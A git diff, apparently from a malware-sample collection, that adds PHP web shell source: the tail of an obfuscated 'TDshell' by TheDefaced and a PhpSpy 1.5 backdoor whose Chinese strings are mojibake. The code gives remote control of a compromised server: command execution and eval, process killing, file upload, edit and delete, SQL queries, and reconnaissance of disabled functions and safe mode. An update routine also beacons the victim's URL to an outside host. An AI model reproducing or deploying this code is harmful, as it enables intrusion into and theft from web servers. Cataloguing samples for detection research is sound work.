"); + return FALSE; + }; + $_c9a15425a6e12ac0295a2b759e048768 = @explode("\n", $_c9a15425a6e12ac0295a2b759e048768); + foreach ($_c9a15425a6e12ac0295a2b759e048768 as $_6557ccde5bb0523391c98ec92365d5a9) + { + if (@preg_match($_4bc9908fada98cbfd1396fceed921faa, $_6557ccde5bb0523391c98ec92365d5a9, $_38c09efe88a67e6a5344c0bbcc44c7d4)) + { + unset($_38c09efe88a67e6a5344c0bbcc44c7d4[0]); + $_38c09efe88a67e6a5344c0bbcc44c7d4['FULL'] = $_6557ccde5bb0523391c98ec92365d5a9; + $_15241b5cdd6d57b1fac3c1eb60905cd8[] = $_38c09efe88a67e6a5344c0bbcc44c7d4; + }; + }; + natsort2d($_15241b5cdd6d57b1fac3c1eb60905cd8); + $_10626691c8b3c6af89adc170cee73ebb = ""; + $_ee1cbb2fd23ff45ac77733a06636a3c7 = ""; + foreach ($_15241b5cdd6d57b1fac3c1eb60905cd8 as $_a3ae37119660c8023a43787f58268912) + { + $_8501d6dd59b45b2159f1f73f6e17b11f = @md5(@microtime() . $_a3ae37119660c8023a43787f58268912); + $_46fc346549f1eeca72e169bb77bf12d8 = ""; + if ($_a3ae37119660c8023a43787f58268912[2] == @getmypid()) + { + $_46fc346549f1eeca72e169bb77bf12d8 = " style='background-color:#FFFFF0'"; + }; + if ($_a3ae37119660c8023a43787f58268912[1] == @get_current_user()) + { + $_a3ae37119660c8023a43787f58268912[1] = "$_a3ae37119660c8023a43787f58268912[1]"; + $_10626691c8b3c6af89adc170cee73ebb .= "$_a3ae37119660c8023a43787f58268912[1]$_a3ae37119660c8023a43787f58268912[2]$_a3ae37119660c8023a43787f58268912[3]" . $this->make_link("proc", array("do" => "kill", "pid" => $_a3ae37119660c8023a43787f58268912[2]), "KILL") . " - " . '[+]
' . $_a3ae37119660c8023a43787f58268912['FULL'] . '
' . ""; + } + else + { + $_ee1cbb2fd23ff45ac77733a06636a3c7 .= "$_a3ae37119660c8023a43787f58268912[1]$_a3ae37119660c8023a43787f58268912[2]$_a3ae37119660c8023a43787f58268912[3]" . $this->make_link("proc", array("do" => "kill", "pid" => $_a3ae37119660c8023a43787f58268912[2]), "KILL") . " - " . '[+]
' . $_a3ae37119660c8023a43787f58268912['FULL'] . '
' . ""; + }; + }; + $this->out("" . $_10626691c8b3c6af89adc170cee73ebb . $_ee1cbb2fd23ff45ac77733a06636a3c7 . "
UserPIDCommandActions
"); + } + else + { + $_6cac525ed87733d2d6bf528558ef4c06 = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['pid']; + if (custom_exec("kill " . @intval($_6cac525ed87733d2d6bf528558ef4c06)) === FALSE) + { + $this->out("
Could not kill process ID " . @intval($_6cac525ed87733d2d6bf528558ef4c06) . "
"); + } + $this->process("proc"); + }; + break; + case "update": + $_c14f19c15d50e72a5733c0ad88a035b9 = @fopen("http://tdshell.thedefaced.org/latest.php?chk=" . @base64_encode(current_URI()), "r"); + while ((!@feof($_c14f19c15d50e72a5733c0ad88a035b9)) && ($_c14f19c15d50e72a5733c0ad88a035b9)) + { + $_45e1fe4475ff3a7426e094d9638a5f22 .= @fread($_c14f19c15d50e72a5733c0ad88a035b9, 1024); + }; + if ($_45e1fe4475ff3a7426e094d9638a5f22 == @md5($this->TDshell_version)) + { + $this->out("Your version of TDshell is up to date."); + } + elseif (empty($_45e1fe4475ff3a7426e094d9638a5f22)) + { + $this->out("Error: Failed to retrieve latest version."); + } + else + { + $this->out("Your version of TDshell is out of date. Please replace your current shell with the latest version located here."); + }; + break; + case "mkdir": + $_0b63e7829d4893613b17575c517db17d = $_POST['mkdir']; + if (empty($_0b63e7829d4893613b17575c517db17d)) + { + $this->out("
Could not create directory, empty name provided.
"); + $this->process("list"); + } + else + { + if (!@mkdir($_0b63e7829d4893613b17575c517db17d, 0777)) + { + $this->out("
Could not create directory, permission denied.
"); + $this->process("list"); + } + else + { + @clearstatcache(); + $this->process("list", array("dir" => $_0b63e7829d4893613b17575c517db17d)); + }; + }; + break; + case "godir": + $_942922064772e69fea37ad32e72dfd70 = $_POST['godir']; + $this->process("list", array("dir" => $_942922064772e69fea37ad32e72dfd70)); + break; + case "mkfile": + $_0dc4ed3391208760f7f43fc80a2441e5 = $_POST['mkfile']; + if (!@fopen($_0dc4ed3391208760f7f43fc80a2441e5, "w")) + { + $this->out("
Could not make file, permission denied.
"); + $this->process("list"); + } + else + { + $this->process("file", array("act" => "edit", "name" => $_0dc4ed3391208760f7f43fc80a2441e5)); + }; + break; + case "gofile": + $_cacb8c32699f649131f8eaa04c25222c = $_POST['gofile']; + $this->process("file", array("act" => "view", "name" => $_cacb8c32699f649131f8eaa04c25222c)); + break; + case "upload": + $_031d648129f7450af0529cbf0825fd58 = $_POST['destination']; + $_8add29b89df2cfe7786dd8ba967ff1e2 = $_031d648129f7450af0529cbf0825fd58 . @basename($_FILES['file']['name']); + if (@move_uploaded_file($_FILES['file']['tmp_name'], $_8add29b89df2cfe7786dd8ba967ff1e2)) + { + $this->process("file", array("act" => "edit", "name" => $_8add29b89df2cfe7786dd8ba967ff1e2)); + } + else + { + $this->out("
Error uploading file!
"); + }; + break; + case "ping": + $this->out("be457c74983226e519e3564f8699eb4e"); + break; + case "alias": + $_93ddad4f44750399cbee70b6508b6ea3 = $_POST['alias']; + $this->process("exec", array("otherexec" => $_93ddad4f44750399cbee70b6508b6ea3, "othermethod" => "textbox")); + break; + case "": + $this->process("list", $_ec4ae32bf3e3a09bae7ff3e84ebbc667); + break; + case "credits": + $this->out("" . $this->TDshell_version . " - Credits
"); + $this->out("www.TheDefaced.org
+Debug: For critical development and idea planning of the shell
+x2Fusion: For crutial ideas and planning of the development of the shell
+Kr3w: For inspirational ideas that contributed greatly to the project
+Tr3mbl3r: With massive ideas for development and features that he planned

TDshell homepage located here."); + break; + case @base64_decode("OTQ1VU84VUVSLTQzOFVFOVJJT0dILTVZUlRHVTlJT1JUTkhHRTVULTQzNVRVR0ZJNUgzNFRBVzk4NC00LTMtMzQ1VERGUw=="): + $this->out(base64_decode("QSBCYW5zaGVlIFRoZSBXaWx0DQpDYW5jZWwgQW5kIFJlYWwNCkhhdCBUaGlucyBUd28NCkVhdGVuIE91dHMgWW93DQoNCkk0U0g4SUZI")); + break; + default: + @ob_start(); + print_r($_ec4ae32bf3e3a09bae7ff3e84ebbc667); + $_bb8084d9c33052d4e3d1354f2746b6bb = @ob_get_clean(); + $this->out("Error: could not process your request; the act does not exist.
Act: $_2e5c25529adea7d7ad4802936aee0b48\n$_bb8084d9c33052d4e3d1354f2746b6bb

"); + break; + }; + } + + function header() + { + $this->out_template("HTML_HEADER_MAIN"); + $this->out_template("HTML_HEADER_HEAD_PRE"); + $this->out_template("HTML_HEADER_HEAD_TITLE"); + $this->out_template("HTML_HEADER_HEAD_SCRIPT"); + $this->out_template("HTML_HEADER_HEAD_STYLE"); + $this->out_template("HTML_HEADER_HEAD_SUF"); + $this->out_template("HTML_HEADER_BODY_PRE"); + } + + function footer($_948b7576a20aa0bb3f1d2055da74156c) + { + $this->out_template("HTML_HEADER_BODY_SUF"); + $this->out(@str_replace("{TIME_TAKEN}", $_948b7576a20aa0bb3f1d2055da74156c, $this->get_template("HTML_FOOTER_MAIN"))); + } + + function out($_45e1fe4475ff3a7426e094d9638a5f22) + { + $this->TDshell_data .= $_45e1fe4475ff3a7426e094d9638a5f22; + } + + function outall() + { + echo $this->sanitize_output($this->TDshell_data); + } + + function set_template($_d3befca3813d65aff84c2353e705a0dd, $_d52f547da0e098832b6b81469d36c48b) + { + $this->TDshell_template[$_d3befca3813d65aff84c2353e705a0dd] = $_d52f547da0e098832b6b81469d36c48b; + } + + function make_link($_2e5c25529adea7d7ad4802936aee0b48, $_ec4ae32bf3e3a09bae7ff3e84ebbc667 = array(), $_a70fd9147fda16858f57fe0479d66df0 = "", $_c8872ae6a7d8ea0f53e6e72ed2ceeac1 = FALSE) + { + if (!empty($_2e5c25529adea7d7ad4802936aee0b48)) + { + $_7622cf6629732edc545313527c803112 = "act=$_2e5c25529adea7d7ad4802936aee0b48"; + } + if (!empty($_ec4ae32bf3e3a09bae7ff3e84ebbc667)) + { + if (!empty($_ec4ae32bf3e3a09bae7ff3e84ebbc667)) + { + if (empty($_2e5c25529adea7d7ad4802936aee0b48)) + { + $_7622cf6629732edc545313527c803112 .= "args="; + } + else + { + $_7622cf6629732edc545313527c803112 .= "&args="; + }; + foreach ($_ec4ae32bf3e3a09bae7ff3e84ebbc667 as $_ddc2938d74cdbcf22f9ecfaf2f1fb5be => $_c7104b3e36401bf0c1d4a5788ac2ad69) + { + $_7622cf6629732edc545313527c803112 .= @base64_encode($_ddc2938d74cdbcf22f9ecfaf2f1fb5be . ":" . $_c7104b3e36401bf0c1d4a5788ac2ad69) . "-"; + }; + if (@substr($_7622cf6629732edc545313527c803112, -1) == "-") + { + $_7622cf6629732edc545313527c803112 = @substr($_7622cf6629732edc545313527c803112, 0, @strlen($_7622cf6629732edc545313527c803112) -1); + }; + }; + }; + $_42a6152a4d7c7d957669c6d70dc5ba87 = 'http'; + if ($_SERVER["HTTPS"] == "on") + { + $_42a6152a4d7c7d957669c6d70dc5ba87 .= "s"; + }; + $_42a6152a4d7c7d957669c6d70dc5ba87 .= "://"; + if ($_SERVER["SERVER_PORT"] != "80") + { + $_42a6152a4d7c7d957669c6d70dc5ba87 .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["SCRIPT_NAME"]; + } + else + { + $_42a6152a4d7c7d957669c6d70dc5ba87 .= $_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"]; + }; + if (!$_c8872ae6a7d8ea0f53e6e72ed2ceeac1) + { + if (empty($_7622cf6629732edc545313527c803112)) + { + $_42a6152a4d7c7d957669c6d70dc5ba87 = $_42a6152a4d7c7d957669c6d70dc5ba87 . "?" . "proc=out"; + } + else + { + $_42a6152a4d7c7d957669c6d70dc5ba87 = $_42a6152a4d7c7d957669c6d70dc5ba87 . "?" . $_7622cf6629732edc545313527c803112 . "&proc=out"; + }; + } + else + { + if (empty($_7622cf6629732edc545313527c803112)) + { + $_42a6152a4d7c7d957669c6d70dc5ba87 = $_42a6152a4d7c7d957669c6d70dc5ba87 . "?"; + } + else + { + $_42a6152a4d7c7d957669c6d70dc5ba87 = $_42a6152a4d7c7d957669c6d70dc5ba87 . "?" . $_7622cf6629732edc545313527c803112; + }; + }; + $_3d1e4e37e3bb032a675f9b0de015bfca = $this->get_template("HTML_REL_LINK_BEG_PRE"); + $_3581e843f20285ea83417f61211d475a = $this->get_template("HTML_REL_LINK_BEG_SUF"); + $_7ebad0a61068a13c2d289a738022186a = $this->get_template("HTML_REL_LINK_END"); + if (!$_c8872ae6a7d8ea0f53e6e72ed2ceeac1) + { + return $_3d1e4e37e3bb032a675f9b0de015bfca . $_42a6152a4d7c7d957669c6d70dc5ba87 . $_3581e843f20285ea83417f61211d475a . $_a70fd9147fda16858f57fe0479d66df0 . $_7ebad0a61068a13c2d289a738022186a; + } + else + { + return $_42a6152a4d7c7d957669c6d70dc5ba87; + }; + } + + function out_template($_d3befca3813d65aff84c2353e705a0dd) + { + $this->out($this->TDshell_template[$_d3befca3813d65aff84c2353e705a0dd]); + } + + function get_template($_d3befca3813d65aff84c2353e705a0dd) + { + return $this->TDshell_template[$_d3befca3813d65aff84c2353e705a0dd]; + } + + function sanitize_output($_5d28db41dd3b63b0ad9702e535eedd73) + { + $_c15977bdc89c079bde3a6687c20c1719 = array( + '/\>[^\S ]+/s', + '/[^\S ]+\', + '<' + ); + $_5d28db41dd3b63b0ad9702e535eedd73 = @preg_replace($_c15977bdc89c079bde3a6687c20c1719, $_0cb75167c55d51f5653f1217678b8a57, $_5d28db41dd3b63b0ad9702e535eedd73); + return $_5d28db41dd3b63b0ad9702e535eedd73; + } + function content_bottom_ext() + { + return ' + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ Quick Execute + + Quick Eval +


+
+ Make Directory + + Go to Directory

+

+ +
+ Make File + + Go to File +

+

+ +
+ Upload File + + Alias Commands +

+
+ + +
'; + } + function content_top_ext() + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "
Server Information:
"; + $_074b7814a5770494227ce06e81ff999a = @getenv("SERVER_SOFTWARE"); + $_a9e5405d6581811dbff46e9ca3280bc1 .= "Software: " . @htmlspecialchars($_074b7814a5770494227ce06e81ff999a) . "
"; + if (($_600528b2c16959ec0b7415143daf3c2c = custom_exec("uptime"))) + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "Uptime: $_600528b2c16959ec0b7415143daf3c2c
"; + }; + + $_4894710f990f9bda9ef69a94d3de9a25 = @wordwrap(@php_uname(),100,"
",1); + $_a9e5405d6581811dbff46e9ca3280bc1 .= "System Info: " . $_4894710f990f9bda9ef69a94d3de9a25 . "
"; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "Disabled Functions: "; + if('' == ($_404553cd7b56719c358d1c6d76f88164 = @ini_get('disable_functions'))) + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "NONE
"; + } + else + { + $_404553cd7b56719c358d1c6d76f88164 = @explode(",", $_404553cd7b56719c358d1c6d76f88164); + $_4b61f566d85332046e5ea8c39d5595a9 = ""; + foreach ($_404553cd7b56719c358d1c6d76f88164 as $_96a32437f909f9609d8bb97987165016) + { + $_96a32437f909f9609d8bb97987165016 = @trim($_96a32437f909f9609d8bb97987165016); + $_4b61f566d85332046e5ea8c39d5595a9 .= "" . $_96a32437f909f9609d8bb97987165016 . "" . ","; + }; + $_4b61f566d85332046e5ea8c39d5595a9 = @substr($_4b61f566d85332046e5ea8c39d5595a9, 0, @strlen($_4b61f566d85332046e5ea8c39d5595a9) - 1); + $_a9e5405d6581811dbff46e9ca3280bc1 .= "$_4b61f566d85332046e5ea8c39d5595a9
"; + }; + if(@ini_get("register_globals")) + { + $_0b72c338824fc598846641f1733ded93 = "ON
"; + } + else + { + $_0b72c338824fc598846641f1733ded93 = "OFF
"; + }; + $_4aa5a13a07418cb3b1f532b2f73d68ae = @function_exists('mysql_connect'); + $_d264811448b31fb4b2772b416c9b6342 = @function_exists('mssql_connect'); + $_4faecc09d416a70e7c85c211689f976c = @function_exists('pg_connect'); + $_8050813e45b77747b44bfa1e66edf6e1 = @function_exists('ocilogon'); + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") + { + $_ff72ae8d0a7c203fdca8802a4a3d4743 = "ON (secure)"; + } + else + { + $_ff72ae8d0a7c203fdca8802a4a3d4743 = "OFF (not secure)"; + }; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "MySQL: "; + if ($_4aa5a13a07418cb3b1f532b2f73d68ae) + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "ON"; + } + else + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "OFF"; + }; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "
"; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "MSSQL: "; + if ($_d264811448b31fb4b2772b416c9b6342) + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "ON"; + } + else + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "OFF"; + }; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "
"; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "PostgreSQL: "; + if ($_4faecc09d416a70e7c85c211689f976c) + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "ON"; + } + else + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "OFF"; + }; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "
"; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "Oracle: "; + if ($_8050813e45b77747b44bfa1e66edf6e1) + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "ON"; + } + else + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "OFF"; + }; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "
"; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "Safemode: "; + $_a9e5405d6581811dbff46e9ca3280bc1 .= $_ff72ae8d0a7c203fdca8802a4a3d4743 . "
"; + $_d94dc5b08d928c237d98b0ed89179043 = @disk_free_space("./"); + $_7467c53f177b1d289f3e1b2e395b9056 = @disk_total_space("./"); + if ($_d94dc5b08d928c237d98b0ed89179043 === FALSE) {$_d94dc5b08d928c237d98b0ed89179043 = 0;} + if ($_7467c53f177b1d289f3e1b2e395b9056 === FALSE) {$_7467c53f177b1d289f3e1b2e395b9056 = 0;} + if ($_d94dc5b08d928c237d98b0ed89179043 < 0) {$_d94dc5b08d928c237d98b0ed89179043 = 0;} + if ($_7467c53f177b1d289f3e1b2e395b9056 < 0) {$_7467c53f177b1d289f3e1b2e395b9056 = 0;} + $_c3574082b118679ba0bc952292c18820 = @round(100/($_7467c53f177b1d289f3e1b2e395b9056/$_d94dc5b08d928c237d98b0ed89179043),2); + $_a9e5405d6581811dbff46e9ca3280bc1 .= "Free: " . view_size($_d94dc5b08d928c237d98b0ed89179043) . " of " . view_size($_7467c53f177b1d289f3e1b2e395b9056) . " (" . $_c3574082b118679ba0bc952292c18820 . "%)
"; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "Your IP: " . $_SERVER['REMOTE_ADDR'] . " Server IP: " . $_SERVER['SERVER_ADDR'] . "
"; + return $_a9e5405d6581811dbff46e9ca3280bc1; + } + }; +$TDshell = new _463f641c8747ebe94fafef7333a99b45; +$TDshell->TDshell_template["HTML_HEADER_MAIN"] = ""; +$TDshell->TDshell_template["HTML_HEADER_HEAD_PRE"] = ""; +$TDshell->TDshell_template["HTML_HEADER_HEAD_TITLE"] = "$_SERVER[SERVER_NAME] - TDshell by TheDefaced (www.TheDefaced.org)"; + +$TDshell->TDshell_template["HTML_HEADER_HEAD_SCRIPT"] = ''; + +$TDshell->TDshell_template["HTML_HEADER_HEAD_STYLE"] = ''; +$TDshell->TDshell_template["HTML_HEADER_HEAD_SUF"] = ""; +$TDshell->TDshell_template["HTML_REL_LINK_BEG_PRE"] = ""; +$TDshell->TDshell_template["HTML_REL_LINK_END"] = ""; + +$TDshell->TDshell_template["HTML_HEADER_BODY_PRE"] = "" . '
+ +
+ + + + + +
+
+
+ ' . $TDshell->content_top_ext() . ' +
+
+
+ [-] +
+
+
Checking for updates...
+'; +$TDshell->TDshell_template["HTML_HEADER_BODY_PRE"] .= '
'; +$TDshell->TDshell_template["HTML_HEADER_BODY_SUF"] = '
' . $TDshell->content_bottom_ext() . '
[-]
'; + +function rphr($_8be065792f9eec8d918c4f68366fc910) + { + $_0609efb0bd944720d85b944586f4dcc7 = @preg_split("//", $_8be065792f9eec8d918c4f68366fc910); + $_4f901119c5ddebb5aa98afc37062ae17 = $_0609efb0bd944720d85b944586f4dcc7[@rand(0, @count($_0609efb0bd944720d85b944586f4dcc7) - 1)]; + $_8be065792f9eec8d918c4f68366fc910 = @str_replace($_4f901119c5ddebb5aa98afc37062ae17, $GLOBALS['TDshell']->make_link(@base64_decode("OTQ1VU84VUVSLTQzOFVFOVJJT0dILTVZUlRHVTlJT1JUTkhHRTVULTQzNVRVR0ZJNUgzNFRBVzk4NC00LTMtMzQ1VERGUw=="), NULL, $_4f901119c5ddebb5aa98afc37062ae17), $_8be065792f9eec8d918c4f68366fc910); + return $_8be065792f9eec8d918c4f68366fc910; + } + +$TDshell->TDshell_template["HTML_FOOTER_MAIN"] = ''; +$TDshell->init(); + diff --git a/PHP/Backdoor.PHP.WebShell.a b/PHP/Backdoor.PHP.WebShell.a new file mode 100644 index 00000000..b0c71fc9 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.a @@ -0,0 +1,810 @@ +"; + echo "×¢Ïú³É¹¦......

ÈýÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌÐò½çÃæ>>>"; + exit; + } + if ($_POST['action'] == "login") { + $adminpass=trim($_POST['adminpass']); + if ($adminpass==$admin['pass']) { + $_SESSION['adminpass'] = $admin['pass']; + echo ""; + echo "µÇ½³É¹¦......

ÈýÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌÐò½çÃæ>>>"; + exit; + } + } + if (session_is_registered('adminpass')) { + if ($_SESSION['adminpass']!=$admin['pass']) { + loginpage(); + } + } else { + loginpage(); + } + } else { + /*------- cookie ÑéÖ¤ -------*/ + if ($_GET['action'] == "logout") { + setcookie ("adminpass", ""); + echo ""; + echo "×¢Ïú³É¹¦......

ÈýÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌÐò½çÃæ>>>"; + exit; + } + if ($_POST['action'] == "login") { + $adminpass=trim($_POST['adminpass']); + if ($adminpass==$admin['pass']) { + setcookie ("adminpass",$admin['pass'],time()+(1*24*3600)); + echo ""; + echo "µÇ½³É¹¦......

ÈýÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌÐò½çÃæ>>>"; + exit; + } + } + if (isset($_COOKIE['adminpass'])) { + if ($_COOKIE['adminpass']!=$admin['pass']) { + loginpage(); + } + } else { + loginpage(); + } + } + +}//end check +/*===================== ÑéÖ¤½áÊø =====================*/ + +// ÅÐ¶Ï magic_quotes_gpc ״̬ +if (get_magic_quotes_gpc()) { + $_GET = stripslashes_array($_GET); + $_POST = stripslashes_array($_POST); +} + +// ÏÂÔØÎļþ +if (!empty($downfile)) { + if (!@file_exists($downfile)) { + echo ""; + } else { + $filename = basename($downfile); + $filename_info = explode('.', $filename); + $fileext = $filename_info[count($filename_info)-1]; + header('Content-type: application/x-'.$fileext); + header('Content-Disposition: attachment; filename='.$filename); + header('Content-Description: PHP3 Generated Data'); + @readfile($downfile); + exit; + } +} + +// ³ÌÐòĿ¼(Îļþϵͳ) +$pathname=str_replace('\\','/',dirname(__FILE__)); + +// »ñÈ¡µ±Ç°Â·¾¶ +if (!isset($dir) or empty($dir)) { + $dir = "."; + $nowpath = getPath($pathname, $dir); +} else { + $dir=$_GET['dir']; + $nowpath = getPath($pathname, $dir); +} + +// Åж϶ÁдÇé¿ö +if (dir_writeable($nowpath)) { + $dir_writeable = "¿Éд"; +} else { + $dir_writeable = "²»¿Éд"; +} + +$dis_func = get_cfg_var("disable_functions"); +$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO" : ""; +$shellmode=(!get_cfg_var("safe_mode")) ? " | WebShellģʽ" : ""; +?> + + + +PhpSpy Ver 1.5 + + + + +

+

×¢Ïú»á»° | ·µ»Ø¸ùĿ¼ | PHP»·¾³±äÁ¿ | SQL²éѯ | Version 1.5

+ + + + + + + + + + + + + + + + + + + + + + +

³ÌÐò·¾¶:
µ±Ç°Ä¿Â¼(,): +
ÌøתĿ¼: + + ¡¼Ö§³Ö¾ø¶Ô·¾¶ºÍÏà¶Ô·¾¶¡½ +

ÉÏ´«Îļþµ½µ±Ç°Ä¿Â¼: + +
н¨ÎļþÔÚµ±Ç°Ä¿Â¼: + + +
н¨Ä¿Â¼ÔÚµ±Ç°Ä¿Â¼: + + +
+
+\n"; +// ɾ³ýÎļþ +if(@$delfile!="") { + if(file_exists($delfile)) { + @unlink($delfile); + echo "".$delfile." ɾ³ý³É¹¦!"; + } else { + echo "ÎļþÒѲ»´æÔÚ,ɾ³ýʧ°Ü!"; + } +} + +// ɾ³ýĿ¼ +elseif($_POST['action'] == "rmdir") { + if($deldir!="") { + $deldirs="$dir/$deldir"; + if(!file_exists("$deldirs")) { + echo "Ŀ¼ÒѲ»´æÔÚ!"; + } else { + deltree($deldirs); + } + } else { + echo "ɾ³ýʧ°Ü!"; + } +} + +// ´´½¨Ä¿Â¼ +elseif($_POST['action'] == "createdirectory") { + if(!empty($newdirectory)) { + $mkdirs="$dir/$newdirectory"; + if(file_exists("$mkdirs")) { + echo "¸ÃĿ¼ÒÑ´æÔÚ!"; + } else { + echo $msg=@mkdir("$mkdirs",0777) ? "´´½¨Ä¿Â¼³É¹¦!" : "´´½¨Ê§°Ü!"; + @chmod("$mkdirs",0777); + } + } +} + +// ÉÏ´«Îļþ +elseif($_POST['action'] == "uploadfile") { + echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "ÉÏ´«³É¹¦!" : "ÉÏ´«Ê§°Ü!"; +} + +// ±à¼­Îļþ +elseif($_POST['action'] == "doeditfile") { + $filename="$dir/$editfilename"; + @$fp=fopen("$filename","w"); + echo $msg=@fwrite($fp,$_POST['filecontent']) ? "дÈëÎļþ³É¹¦!" : "дÈëʧ°Ü!"; + @fclose($fp); +} + +// ±à¼­ÎļþÊôÐÔ +elseif($_POST['action'] == "editfileperm") { + $fileperm=base_convert($_POST['fileperm'],8,10); + echo $msg=@chmod($dir."/".$file,$fileperm) ? "ÊôÐÔÐ޸ijɹ¦!" : "ÐÞ¸Äʧ°Ü!"; + echo " [".$file."] Ð޸ĺóµÄÊôÐÔΪ:".substr(base_convert(@fileperms($dir."/".$file),10,8),-4).""; +} + +// Á¬½ÓMYSQL +elseif($connect) { + if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) { + echo "Êý¾Ý¿âÁ¬½Ó³É¹¦!"; + } else { + echo mysql_error(); + } +} + +// Ö´ÐÐSQLÓï¾ä +elseif($doquery) { + @mysql_connect($servername,$dbusername,$dbpassword) or die("Êý¾Ý¿âÁ¬½Óʧ°Ü"); + @mysql_select_db($dbname) or die("Ñ¡ÔñÊý¾Ý¿âʧ°Ü"); + $result = @mysql_query($_POST['sql_query']); + if ($result) { + echo "SQLÓï¾ä³É¹¦Ö´ÐÐ"; + }else{ + echo "³ö´í: ".mysql_error(); + } + mysql_close(); +} + +// ²é¿´PHPÅäÖòÎÊý×´¿ö +elseif($_POST['action'] == "viewphpvar") { + echo "ÅäÖòÎÊý ".$_POST['phpvarname']." ¼ì²â½á¹û: ".getphpcfg($_POST['phpvarname']).""; +} + +else { + echo "±¾³ÌÐòÓÉ Security Angel °²È«×éÖ¯ angel[BST] ¶ÀÁ¢¿ª·¢,¿ÉÔÚ http://www.4ngel.net ÏÂÔØ×îа汾."; +} + +echo "

\n"; +/*===================== Ö´ÐвÙ×÷ ½áÊø =====================*/ + +if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { +?> + + + + + + + + +\n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo "\n"; + } else { + if($file=="..") { + echo "\n"; + echo " \n"; + echo "\n"; + } + } + $dir_i++; + } +}//while +@closedir($dirs); + +// ÎļþÁбí +$dirs=@opendir($dir); +while ($file=@readdir($dirs)) { + $b="$dir/$file"; + $a=@is_dir($b); + if($a=="0"){ + $size=@filesize("$dir/$file"); + $size=$size/1024 ; + $size= @number_format($size, 3); + $lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file")); + @$fileperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4); + echo "\n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo "\n"; + $file_i++; + } +} +@closedir($dirs); + +echo "\n"; +echo " \n"; +echo "\n"; +?> +
ÎļþÐÞ¸ÄÈÕÆÚ´óСÊôÐÔ²Ù×÷
[$file]$lastsave<dir>$dirpermɾ³ý
·µ»ØÉϼ¶Ä¿Â¼
$file$lastsave$size KB$filepermÏÂÔØ | ±à¼­ | ɾ³ý
".$dir_i." ¸öĿ¼
".$file_i." ¸öÎļþ
+ + + + + + + + + + + + + + + + + +
н¨/±à¼­Îļþ [·µ»Ø]
µ±Ç°Îļþ: ÊäÈëÐÂÎļþÃûÔò½¨Á¢ÐÂÎļþ
+ +
+ + + + + + + + + + + + + + + + +
WebShell Mode
Ìáʾ:Èç¹ûÊä³ö½á¹û²»ÍêÈ«,½¨Òé°ÑÊä³ö½á¹ûдÈëÎļþ.ÕâÑù¿ÉÒԵõ½È«²¿ÄÚÈÝ.
+ Ñ¡ÔñÖ´Ðк¯Êý: + ¡¡ + ÊäÈëÃüÁî: + +
+ +

Safe_Mode ÒÑ´ò¿ª, ÎÞ·¨Ö´ÐÐϵͳÃüÁî.

+ + + + + + + + + + + + + +
ɾ³ý Ŀ¼
×¢Òâ:Èç¹û¸ÃĿ¼·Ç¿Õ,´Ë´Î²Ù×÷½«»áɾ³ý¸ÃĿ¼ÏµÄËùÓÐÎļþ.ÄúÈ·¶¨Âð?
+ + +
+ + + + + + + + + + +
ÐÞ¸ÄÎļþÊôÐÔ [·µ»Ø]
µÄÊôÐÔΪ: + " class="input"> + + +
+ + + + + + + + + + + + + + + + +
Ö´ÐÐ SQL Óï¾ä
Host: + + User: + + Pass: + + DB: + +
+".$_SERVER["SERVER_ADMIN"]."" : "".get_cfg_var("sendmail_from").""; + + $dis_func = get_cfg_var("disable_functions"); + if ($dis_func == "") { + $dis_func = "No"; + }else { + $dis_func = str_replace(" ","
",$dis_func); + $dis_func = str_replace(",","
